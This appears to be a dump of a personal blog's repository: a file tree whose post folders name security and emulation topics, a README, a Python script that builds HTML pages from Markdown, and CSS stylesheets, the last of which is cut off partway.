├── .gitignore
├── README.md
├── build.py
├── css
    ├── code.css
    └── markdown.css
├── index.html
├── posts
    ├── 2013-03-08-wpa2-vulnerability-tplink
    │   ├── _main.md
    │   └── index.html
    ├── 2013-03-30-virtualdj-73-buffer-overflow
    │   ├── _main.md
    │   └── index.html
    ├── 2013-03-31-wpa2-vulnerability-linksys-dlink
    │   ├── _main.md
    │   └── index.html
    ├── 2013-04-20-virtualdj-74-buffer-overflow
    │   ├── _main.md
    │   └── index.html
    ├── 2016-03-16-ps3-gpu-exploit
    │   ├── _main.md
    │   └── index.html
    ├── 2016-08-22-observations
    │   ├── _main.md
    │   └── index.html
    ├── 2016-09-14-jit-compiled-maps
    │   ├── _main.md
    │   └── index.html
    ├── 2016-10-12-xchg-rax-rax-solutions
    │   ├── _main.md
    │   ├── index.html
    │   ├── xorpd_0x3c_hilbert.png
    │   ├── xorpd_0x3c_hilbert.py
    │   ├── xorpd_0x3d_morton.png
    │   ├── xorpd_0x3d_morton.py
    │   └── xorpd_0x3f_hanoi.png
    ├── 2017-07-19-googlectf-2017-moon
    │   ├── _main.md
    │   ├── _main.pdf
    │   ├── apitrace.png
    │   ├── bruteforcer.py
    │   ├── ida.png
    │   ├── index.html
    │   ├── latex-1.png
    │   ├── latex-2.png
    │   ├── moon.glsl
    │   └── moon.zip
    ├── 2018-04-18-lle-vs-hle
    │   ├── _main.md
    │   └── index.html
    ├── 2019-02-16-cell-miner-alu
    │   ├── _main.md
    │   ├── arithmetic.s
    │   └── index.html
    └── 2024-04-28-quotes
    │   └── _main.md
├── requirements.txt
└── templates
    ├── index.html
    └── post.html


/.gitignore:
--------------------------------------------------------------------------------
1 | *.ffs_db
2 | debug.log
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Blog
2 | ====
3 | 
4 | Articles and resources of my blog. Written in Markdown.
5 | 
6 | Licensed under [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/).
7 | 


--------------------------------------------------------------------------------
/build.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import os
 4 | 
 5 | import markdown
 6 | import pygments
 7 | 
 8 | # Globals
 9 | index = []
10 | 
11 | # Markdown
12 | md = markdown.Markdown(
13 |     encoding='utf=8',
14 |     output_format='html5',
15 |     extensions=[
16 |         'markdown.extensions.codehilite',
17 |         'markdown.extensions.fenced_code',
18 |         'markdown.extensions.meta',
19 |         'markdown.extensions.tables',
20 |         'markdown.extensions.toc',
21 |     ])
22 | 
23 | # Build
24 | def build_post_markdown(source, target):
25 |     with open(source, 'r') as f:
26 |         text = f.read()
27 |     metadata = {}
28 |     metadata['link'] = target
29 |     content = md.convert(text)
30 |     for k,v in md.Meta.items():
31 |         metadata[k] = v[0]
32 |     index.append(metadata)
33 |     with open('templates/post.html', 'r') as f:
34 |         post = f.read()
35 |         post = post.replace('$date', metadata['date'])
36 |         post = post.replace('$title', metadata['title'])
37 |         post = post.replace('$author', metadata['author'])
38 |         post = post.replace('$content', content)
39 |     with open(target, 'w') as f:
40 |         f.write('<!-- This file has been auto-generated! -->\n')
41 |         f.write(post)
42 | 
43 | def build_post(path):
44 |     source = os.path.join(path, '_main.md')
45 |     target = os.path.join(path, 'index.html')
46 |     if os.path.isfile(source):
47 |         print('Building: %s' % source)
48 |         build_post_markdown(source, target)
49 | 
50 | def build_index(target):
51 |     posts = '<thead><td><b>Date</b></td><td><b>Article</b></td></thead>'
52 |     for post in index[::-1]:
53 |         link = post['link'].replace('index.html', '')
54 |         posts += '<tr><td>%s</td><td><a href="%s">%s</a></td></tr>' % (
55 |             post['date'], link, post['title'])
56 |     posts = '<table>%s</table>' % (posts)
57 |     with open('templates/index.html', 'r') as f:
58 |         html = f.read()
59 |         html = html.replace('$posts', posts)
60 |     with open(target, 'w') as f:
61 |         f.write('<!-- This file has been auto-generated! -->\n')
62 |         f.write(html)
63 | 
64 | def build_all():
65 |     # Create posts
66 |     posts = 'posts'
67 |     for path in os.listdir(posts):
68 |         path = os.path.join(posts, path)
69 |         build_post(path)
70 |     # Create index
71 |     build_index('index.html')
72 | 
73 | def main():
74 |     build_all()
75 |     return
76 | 
77 | if __name__ == '__main__':
78 |     main()
79 | 


--------------------------------------------------------------------------------
/css/code.css:
--------------------------------------------------------------------------------
 1 | .codehilite .hll { background-color: #ffffcc }
 2 | .codehilite  { background: #f8f8f8; }
 3 | .codehilite .c { color: #408080; font-style: italic } /* Comment */
 4 | .codehilite .err { border: 0px solid #FF0000 } /* Error */
 5 | .codehilite .k { color: #008000; font-weight: bold } /* Keyword */
 6 | .codehilite .o { color: #666666 } /* Operator */
 7 | .codehilite .ch { color: #408080; font-style: italic } /* Comment.Hashbang */
 8 | .codehilite .cm { color: #408080; font-style: italic } /* Comment.Multiline */
 9 | .codehilite .cp { color: #BC7A00 } /* Comment.Preproc */
10 | .codehilite .cpf { color: #408080; font-style: italic } /* Comment.PreprocFile */
11 | .codehilite .c1 { color: #408080; font-style: italic } /* Comment.Single */
12 | .codehilite .cs { color: #408080; font-style: italic } /* Comment.Special */
13 | .codehilite .gd { color: #A00000 } /* Generic.Deleted */
14 | .codehilite .ge { font-style: italic } /* Generic.Emph */
15 | .codehilite .gr { color: #FF0000 } /* Generic.Error */
16 | .codehilite .gh { color: #000080; font-weight: bold } /* Generic.Heading */
17 | .codehilite .gi { color: #00A000 } /* Generic.Inserted */
18 | .codehilite .go { color: #888888 } /* Generic.Output */
19 | .codehilite .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
20 | .codehilite .gs { font-weight: bold } /* Generic.Strong */
21 | .codehilite .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
22 | .codehilite .gt { color: #0044DD } /* Generic.Traceback */
23 | .codehilite .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
24 | .codehilite .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
25 | .codehilite .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
26 | .codehilite .kp { color: #008000 } /* Keyword.Pseudo */
27 | .codehilite .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
28 | .codehilite .kt { color: #B00040 } /* Keyword.Type */
29 | .codehilite .m { color: #666666 } /* Literal.Number */
30 | .codehilite .s { color: #BA2121 } /* Literal.String */
31 | .codehilite .na { color: #7D9029 } /* Name.Attribute */
32 | .codehilite .nb { color: #008000 } /* Name.Builtin */
33 | .codehilite .nc { color: #0000FF; font-weight: bold } /* Name.Class */
34 | .codehilite .no { color: #880000 } /* Name.Constant */
35 | .codehilite .nd { color: #AA22FF } /* Name.Decorator */
36 | .codehilite .ni { color: #999999; font-weight: bold } /* Name.Entity */
37 | .codehilite .ne { color: #D2413A; font-weight: bold } /* Name.Exception */
38 | .codehilite .nf { color: #0000FF } /* Name.Function */
39 | .codehilite .nl { color: #A0A000 } /* Name.Label */
40 | .codehilite .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
41 | .codehilite .nt { color: #008000; font-weight: bold } /* Name.Tag */
42 | .codehilite .nv { color: #19177C } /* Name.Variable */
43 | .codehilite .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
44 | .codehilite .w { color: #bbbbbb } /* Text.Whitespace */
45 | .codehilite .mb { color: #666666 } /* Literal.Number.Bin */
46 | .codehilite .mf { color: #666666 } /* Literal.Number.Float */
47 | .codehilite .mh { color: #666666 } /* Literal.Number.Hex */
48 | .codehilite .mi { color: #666666 } /* Literal.Number.Integer */
49 | .codehilite .mo { color: #666666 } /* Literal.Number.Oct */
50 | .codehilite .sa { color: #BA2121 } /* Literal.String.Affix */
51 | .codehilite .sb { color: #BA2121 } /* Literal.String.Backtick */
52 | .codehilite .sc { color: #BA2121 } /* Literal.String.Char */
53 | .codehilite .dl { color: #BA2121 } /* Literal.String.Delimiter */
54 | .codehilite .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
55 | .codehilite .s2 { color: #BA2121 } /* Literal.String.Double */
56 | .codehilite .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */
57 | .codehilite .sh { color: #BA2121 } /* Literal.String.Heredoc */
58 | .codehilite .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */
59 | .codehilite .sx { color: #008000 } /* Literal.String.Other */
60 | .codehilite .sr { color: #BB6688 } /* Literal.String.Regex */
61 | .codehilite .s1 { color: #BA2121 } /* Literal.String.Single */
62 | .codehilite .ss { color: #19177C } /* Literal.String.Symbol */
63 | .codehilite .bp { color: #008000 } /* Name.Builtin.Pseudo */
64 | .codehilite .fm { color: #0000FF } /* Name.Function.Magic */
65 | .codehilite .vc { color: #19177C } /* Name.Variable.Class */
66 | .codehilite .vg { color: #19177C } /* Name.Variable.Global */
67 | .codehilite .vi { color: #19177C } /* Name.Variable.Instance */
68 | .codehilite .vm { color: #19177C } /* Name.Variable.Magic */
69 | .codehilite .il { color: #666666 } /* Literal.Number.Integer.Long */
70 | 


--------------------------------------------------------------------------------
/css/markdown.css:
--------------------------------------------------------------------------------
  1 | @font-face {
  2 |   font-family: octicons-link;
  3 |   src: url(data:font/woff;charset=utf-8;base64,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) format('woff');
  4 | }
  5 | 
  6 | .markdown-body .octicon {
  7 |   display: inline-block;
  8 |   fill: currentColor;
  9 |   vertical-align: text-bottom;
 10 | }
 11 | 
 12 | .markdown-body .anchor {
 13 |   float: left;
 14 |   line-height: 1;
 15 |   margin-left: -20px;
 16 |   padding-right: 4px;
 17 | }
 18 | 
 19 | .markdown-body .anchor:focus {
 20 |   outline: none;
 21 | }
 22 | 
 23 | .markdown-body h1 .octicon-link,
 24 | .markdown-body h2 .octicon-link,
 25 | .markdown-body h3 .octicon-link,
 26 | .markdown-body h4 .octicon-link,
 27 | .markdown-body h5 .octicon-link,
 28 | .markdown-body h6 .octicon-link {
 29 |   color: #1b1f23;
 30 |   vertical-align: middle;
 31 |   visibility: hidden;
 32 | }
 33 | 
 34 | .markdown-body h1:hover .anchor,
 35 | .markdown-body h2:hover .anchor,
 36 | .markdown-body h3:hover .anchor,
 37 | .markdown-body h4:hover .anchor,
 38 | .markdown-body h5:hover .anchor,
 39 | .markdown-body h6:hover .anchor {
 40 |   text-decoration: none;
 41 | }
 42 | 
 43 | .markdown-body h1:hover .anchor .octicon-link,
 44 | .markdown-body h2:hover .anchor .octicon-link,
 45 | .markdown-body h3:hover .anchor .octicon-link,
 46 | .markdown-body h4:hover .anchor .octicon-link,
 47 | .markdown-body h5:hover .anchor .octicon-link,
 48 | .markdown-body h6:hover .anchor .octicon-link {
 49 |   visibility: visible;
 50 | }
 51 | 
 52 | .markdown-body {
 53 |   -ms-text-size-adjust: 100%;
 54 |   -webkit-text-size-adjust: 100%;
 55 |   color: #24292e;
 56 |   line-height: 1.5;
 57 |   font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
 58 |   font-size: 16px;
 59 |   line-height: 1.5;
 60 |   word-wrap: break-word;
 61 | }
 62 | 
 63 | .markdown-body .pl-c {
 64 |   color: #6a737d;
 65 | }
 66 | 
 67 | .markdown-body .pl-c1,
 68 | .markdown-body .pl-s .pl-v {
 69 |   color: #005cc5;
 70 | }
 71 | 
 72 | .markdown-body .pl-e,
 73 | .markdown-body .pl-en {
 74 |   color: #6f42c1;
 75 | }
 76 | 
 77 | .markdown-body .pl-s .pl-s1,
 78 | .markdown-body .pl-smi {
 79 |   color: #24292e;
 80 | }
 81 | 
 82 | .markdown-body .pl-ent {
 83 |   color: #22863a;
 84 | }
 85 | 
 86 | .markdown-body .pl-k {
 87 |   color: #d73a49;
 88 | }
 89 | 
 90 | .markdown-body .pl-pds,
 91 | .markdown-body .pl-s,
 92 | .markdown-body .pl-s .pl-pse .pl-s1,
 93 | .markdown-body .pl-sr,
 94 | .markdown-body .pl-sr .pl-cce,
 95 | .markdown-body .pl-sr .pl-sra,
 96 | .markdown-body .pl-sr .pl-sre {
 97 |   color: #032f62;
 98 | }
 99 | 
100 | .markdown-body .pl-smw,
101 | .markdown-body .pl-v {
102 |   color: #e36209;
103 | }
104 | 
105 | .markdown-body .pl-bu {
106 |   color: #b31d28;
107 | }
108 | 
109 | .markdown-body .pl-ii {
110 |   background-color: #b31d28;
111 |   color: #fafbfc;
112 | }
113 | 
114 | .markdown-body .pl-c2 {
115 |   background-color: #d73a49;
116 |   color: #fafbfc;
117 | }
118 | 
119 | .markdown-body .pl-c2:before {
120 |   content: "^M";
121 | }
122 | 
123 | .markdown-body .pl-sr .pl-cce {
124 |   color: #22863a;
125 |   font-weight: 700;
126 | }
127 | 
128 | .markdown-body .pl-ml {
129 |   color: #735c0f;
130 | }
131 | 
132 | .markdown-body .pl-mh,
133 | .markdown-body .pl-mh .pl-en,
134 | .markdown-body .pl-ms {
135 |   color: #005cc5;
136 |   font-weight: 700;
137 | }
138 | 
139 | .markdown-body .pl-mi {
140 |   color: #24292e;
141 |   font-style: italic;
142 | }
143 | 
144 | .markdown-body .pl-mb {
145 |   color: #24292e;
146 |   font-weight: 700;
147 | }
148 | 
149 | .markdown-body .pl-md {
150 |   background-color: #ffeef0;
151 |   color: #b31d28;
152 | }
153 | 
154 | .markdown-body .pl-mi1 {
155 |   background-color: #f0fff4;
156 |   color: #22863a;
157 | }
158 | 
159 | .markdown-body .pl-mc {
160 |   background-color: #ffebda;
161 |   color: #e36209;
162 | }
163 | 
164 | .markdown-body .pl-mi2 {
165 |   background-color: #005cc5;
166 |   color: #f6f8fa;
167 | }
168 | 
169 | .markdown-body .pl-mdr {
170 |   color: #6f42c1;
171 |   font-weight: 700;
172 | }
173 | 
174 | .markdown-body .pl-ba {
175 |   color: #586069;
176 | }
177 | 
178 | .markdown-body .pl-sg {
179 |   color: #959da5;
180 | }
181 | 
182 | .markdown-body .pl-corl {
183 |   color: #032f62;
184 |   text-decoration: underline;
185 | }
186 | 
187 | .markdown-body details {
188 |   display: block;
189 | }
190 | 
191 | .markdown-body summary {
192 |   display: list-item;
193 | }
194 | 
195 | .markdown-body a {
196 |   background-color: transparent;
197 | }
198 | 
199 | .markdown-body a:active,
200 | .markdown-body a:hover {
201 |   outline-width: 0;
202 | }
203 | 
204 | .markdown-body strong {
205 |   font-weight: inherit;
206 |   font-weight: bolder;
207 | }
208 | 
209 | .markdown-body h1 {
210 |   font-size: 2em;
211 |   margin: .67em 0;
212 | }
213 | 
214 | .markdown-body img {
215 |   border-style: none;
216 | }
217 | 
218 | .markdown-body code,
219 | .markdown-body kbd,
220 | .markdown-body pre {
221 |   font-family: monospace,monospace;
222 |   font-size: 1em;
223 | }
224 | 
225 | .markdown-body hr {
226 |   box-sizing: content-box;
227 |   height: 0;
228 |   overflow: visible;
229 | }
230 | 
231 | .markdown-body input {
232 |   font: inherit;
233 |   margin: 0;
234 | }
235 | 
236 | .markdown-body input {
237 |   overflow: visible;
238 | }
239 | 
240 | .markdown-body [type=checkbox] {
241 |   box-sizing: border-box;
242 |   padding: 0;
243 | }
244 | 
245 | .markdown-body * {
246 |   box-sizing: border-box;
247 | }
248 | 
249 | .markdown-body input {
250 |   font-family: inherit;
251 |   font-size: inherit;
252 |   line-height: inherit;
253 | }
254 | 
255 | .markdown-body a {
256 |   color: #0366d6;
257 |   text-decoration: none;
258 | }
259 | 
260 | .markdown-body a:hover {
261 |   text-decoration: underline;
262 | }
263 | 
264 | .markdown-body strong {
265 |   font-weight: 600;
266 | }
267 | 
268 | .markdown-body hr {
269 |   background: transparent;
270 |   border: 0;
271 |   border-bottom: 1px solid #dfe2e5;
272 |   height: 0;
273 |   margin: 15px 0;
274 |   overflow: hidden;
275 | }
276 | 
277 | .markdown-body hr:before {
278 |   content: "";
279 |   display: table;
280 | }
281 | 
282 | .markdown-body hr:after {
283 |   clear: both;
284 |   content: "";
285 |   display: table;
286 | }
287 | 
288 | .markdown-body table {
289 |   border-collapse: collapse;
290 |   border-spacing: 0;
291 | }
292 | 
293 | .markdown-body td,
294 | .markdown-body th {
295 |   padding: 0;
296 | }
297 | 
298 | .markdown-body details summary {
299 |   cursor: pointer;
300 | }
301 | 
302 | .markdown-body h1,
303 | .markdown-body h2,
304 | .markdown-body h3,
305 | .markdown-body h4,
306 | .markdown-body h5,
307 | .markdown-body h6 {
308 |   margin-bottom: 0;
309 |   margin-top: 0;
310 | }
311 | 
312 | .markdown-body h1 {
313 |   font-size: 32px;
314 | }
315 | 
316 | .markdown-body h1,
317 | .markdown-body h2 {
318 |   font-weight: 600;
319 | }
320 | 
321 | .markdown-body h2 {
322 |   font-size: 24px;
323 | }
324 | 
325 | .markdown-body h3 {
326 |   font-size: 20px;
327 | }
328 | 
329 | .markdown-body h3,
330 | .markdown-body h4 {
331 |   font-weight: 600;
332 | }
333 | 
334 | .markdown-body h4 {
335 |   font-size: 16px;
336 | }
337 | 
338 | .markdown-body h5 {
339 |   font-size: 14px;
340 | }
341 | 
342 | .markdown-body h5,
343 | .markdown-body h6 {
344 |   font-weight: 600;
345 | }
346 | 
347 | .markdown-body h6 {
348 |   font-size: 12px;
349 | }
350 | 
351 | .markdown-body p {
352 |   margin-bottom: 10px;
353 |   margin-top: 0;
354 | }
355 | 
356 | .markdown-body blockquote {
357 |   margin: 0;
358 | }
359 | 
360 | .markdown-body ol,
361 | .markdown-body ul {
362 |   margin-bottom: 0;
363 |   margin-top: 0;
364 |   padding-left: 0;
365 | }
366 | 
367 | .markdown-body ol ol,
368 | .markdown-body ul ol {
369 |   list-style-type: lower-roman;
370 | }
371 | 
372 | .markdown-body ol ol ol,
373 | .markdown-body ol ul ol,
374 | .markdown-body ul ol ol,
375 | .markdown-body ul ul ol {
376 |   list-style-type: lower-alpha;
377 | }
378 | 
379 | .markdown-body dd {
380 |   margin-left: 0;
381 | }
382 | 
383 | .markdown-body code,
384 | .markdown-body pre {
385 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
386 |   font-size: 12px;
387 | }
388 | 
389 | .markdown-body pre {
390 |   margin-bottom: 0;
391 |   margin-top: 0;
392 | }
393 | 
394 | .markdown-body input::-webkit-inner-spin-button,
395 | .markdown-body input::-webkit-outer-spin-button {
396 |   -webkit-appearance: none;
397 |   appearance: none;
398 |   margin: 0;
399 | }
400 | 
401 | .markdown-body .border {
402 |   border: 1px solid #e1e4e8!important;
403 | }
404 | 
405 | .markdown-body .border-0 {
406 |   border: 0!important;
407 | }
408 | 
409 | .markdown-body .border-bottom {
410 |   border-bottom: 1px solid #e1e4e8!important;
411 | }
412 | 
413 | .markdown-body .rounded-1 {
414 |   border-radius: 3px!important;
415 | }
416 | 
417 | .markdown-body .bg-white {
418 |   background-color: #fff!important;
419 | }
420 | 
421 | .markdown-body .bg-gray-light {
422 |   background-color: #fafbfc!important;
423 | }
424 | 
425 | .markdown-body .text-gray-light {
426 |   color: #6a737d!important;
427 | }
428 | 
429 | .markdown-body .mb-0 {
430 |   margin-bottom: 0!important;
431 | }
432 | 
433 | .markdown-body .my-2 {
434 |   margin-bottom: 8px!important;
435 |   margin-top: 8px!important;
436 | }
437 | 
438 | .markdown-body .pl-0 {
439 |   padding-left: 0!important;
440 | }
441 | 
442 | .markdown-body .py-0 {
443 |   padding-bottom: 0!important;
444 |   padding-top: 0!important;
445 | }
446 | 
447 | .markdown-body .pl-1 {
448 |   padding-left: 4px!important;
449 | }
450 | 
451 | .markdown-body .pl-2 {
452 |   padding-left: 8px!important;
453 | }
454 | 
455 | .markdown-body .py-2 {
456 |   padding-bottom: 8px!important;
457 |   padding-top: 8px!important;
458 | }
459 | 
460 | .markdown-body .pl-3,
461 | .markdown-body .px-3 {
462 |   padding-left: 16px!important;
463 | }
464 | 
465 | .markdown-body .px-3 {
466 |   padding-right: 16px!important;
467 | }
468 | 
469 | .markdown-body .pl-4 {
470 |   padding-left: 24px!important;
471 | }
472 | 
473 | .markdown-body .pl-5 {
474 |   padding-left: 32px!important;
475 | }
476 | 
477 | .markdown-body .pl-6 {
478 |   padding-left: 40px!important;
479 | }
480 | 
481 | .markdown-body .f6 {
482 |   font-size: 12px!important;
483 | }
484 | 
485 | .markdown-body .lh-condensed {
486 |   line-height: 1.25!important;
487 | }
488 | 
489 | .markdown-body .text-bold {
490 |   font-weight: 600!important;
491 | }
492 | 
493 | .markdown-body:before {
494 |   content: "";
495 |   display: table;
496 | }
497 | 
498 | .markdown-body:after {
499 |   clear: both;
500 |   content: "";
501 |   display: table;
502 | }
503 | 
504 | .markdown-body>:first-child {
505 |   margin-top: 0!important;
506 | }
507 | 
508 | .markdown-body>:last-child {
509 |   margin-bottom: 0!important;
510 | }
511 | 
512 | .markdown-body a:not([href]) {
513 |   color: inherit;
514 |   text-decoration: none;
515 | }
516 | 
517 | .markdown-body blockquote,
518 | .markdown-body dl,
519 | .markdown-body ol,
520 | .markdown-body p,
521 | .markdown-body pre,
522 | .markdown-body table,
523 | .markdown-body ul {
524 |   margin-bottom: 16px;
525 |   margin-top: 0;
526 | }
527 | 
528 | .markdown-body hr {
529 |   background-color: #e1e4e8;
530 |   border: 0;
531 |   height: .25em;
532 |   margin: 24px 0;
533 |   padding: 0;
534 | }
535 | 
536 | .markdown-body blockquote {
537 |   border-left: .25em solid #dfe2e5;
538 |   color: #6a737d;
539 |   padding: 0 1em;
540 | }
541 | 
542 | .markdown-body blockquote>:first-child {
543 |   margin-top: 0;
544 | }
545 | 
546 | .markdown-body blockquote>:last-child {
547 |   margin-bottom: 0;
548 | }
549 | 
550 | .markdown-body kbd {
551 |   background-color: #fafbfc;
552 |   border: 1px solid #c6cbd1;
553 |   border-bottom-color: #959da5;
554 |   border-radius: 3px;
555 |   box-shadow: inset 0 -1px 0 #959da5;
556 |   color: #444d56;
557 |   display: inline-block;
558 |   font-size: 11px;
559 |   line-height: 10px;
560 |   padding: 3px 5px;
561 |   vertical-align: middle;
562 | }
563 | 
564 | .markdown-body h1,
565 | .markdown-body h2,
566 | .markdown-body h3,
567 | .markdown-body h4,
568 | .markdown-body h5,
569 | .markdown-body h6 {
570 |   font-weight: 600;
571 |   line-height: 1.25;
572 |   margin-bottom: 16px;
573 |   margin-top: 24px;
574 | }
575 | 
576 | .markdown-body h1 {
577 |   font-size: 2em;
578 | }
579 | 
580 | .markdown-body h1,
581 | .markdown-body h2 {
582 |   border-bottom: 1px solid #eaecef;
583 |   padding-bottom: .3em;
584 | }
585 | 
586 | .markdown-body h2 {
587 |   font-size: 1.5em;
588 | }
589 | 
590 | .markdown-body h3 {
591 |   font-size: 1.25em;
592 | }
593 | 
594 | .markdown-body h4 {
595 |   font-size: 1em;
596 | }
597 | 
598 | .markdown-body h5 {
599 |   font-size: .875em;
600 | }
601 | 
602 | .markdown-body h6 {
603 |   color: #6a737d;
604 |   font-size: .85em;
605 | }
606 | 
607 | .markdown-body ol,
608 | .markdown-body ul {
609 |   padding-left: 2em;
610 | }
611 | 
612 | .markdown-body ol ol,
613 | .markdown-body ol ul,
614 | .markdown-body ul ol,
615 | .markdown-body ul ul {
616 |   margin-bottom: 0;
617 |   margin-top: 0;
618 | }
619 | 
620 | .markdown-body li {
621 |   word-wrap: break-all;
622 | }
623 | 
624 | .markdown-body li>p {
625 |   margin-top: 16px;
626 | }
627 | 
628 | .markdown-body li+li {
629 |   margin-top: .25em;
630 | }
631 | 
632 | .markdown-body dl {
633 |   padding: 0;
634 | }
635 | 
636 | .markdown-body dl dt {
637 |   font-size: 1em;
638 |   font-style: italic;
639 |   font-weight: 600;
640 |   margin-top: 16px;
641 |   padding: 0;
642 | }
643 | 
644 | .markdown-body dl dd {
645 |   margin-bottom: 16px;
646 |   padding: 0 16px;
647 | }
648 | 
649 | .markdown-body table {
650 |   display: block;
651 |   overflow: auto;
652 |   width: 100%;
653 | }
654 | 
655 | .markdown-body table th {
656 |   font-weight: 600;
657 | }
658 | 
659 | .markdown-body table td,
660 | .markdown-body table th {
661 |   border: 1px solid #dfe2e5;
662 |   padding: 6px 13px;
663 | }
664 | 
665 | .markdown-body table tr {
666 |   background-color: #fff;
667 |   border-top: 1px solid #c6cbd1;
668 | }
669 | 
670 | .markdown-body table tr:nth-child(2n) {
671 |   background-color: #f6f8fa;
672 | }
673 | 
674 | .markdown-body img {
675 |   background-color: #fff;
676 |   box-sizing: content-box;
677 |   max-width: 100%;
678 | }
679 | 
680 | .markdown-body img[align=right] {
681 |   padding-left: 20px;
682 | }
683 | 
684 | .markdown-body img[align=left] {
685 |   padding-right: 20px;
686 | }
687 | 
688 | .markdown-body code {
689 |   background-color: rgba(27,31,35,.05);
690 |   border-radius: 3px;
691 |   font-size: 85%;
692 |   margin: 0;
693 |   padding: .2em .4em;
694 | }
695 | 
696 | .markdown-body pre {
697 |   word-wrap: normal;
698 | }
699 | 
700 | .markdown-body pre>code {
701 |   background: transparent;
702 |   border: 0;
703 |   font-size: 100%;
704 |   margin: 0;
705 |   padding: 0;
706 |   white-space: pre;
707 |   word-break: normal;
708 | }
709 | 
710 | .markdown-body .highlight {
711 |   margin-bottom: 16px;
712 | }
713 | 
714 | .markdown-body .highlight pre {
715 |   margin-bottom: 0;
716 |   word-break: normal;
717 | }
718 | 
719 | .markdown-body .highlight pre,
720 | .markdown-body pre {
721 |   background-color: #f6f8fa;
722 |   border-radius: 3px;
723 |   font-size: 85%;
724 |   line-height: 1.45;
725 |   overflow: auto;
726 |   padding: 16px;
727 | }
728 | 
729 | .markdown-body pre code {
730 |   background-color: transparent;
731 |   border: 0;
732 |   display: inline;
733 |   line-height: inherit;
734 |   margin: 0;
735 |   max-width: auto;
736 |   overflow: visible;
737 |   padding: 0;
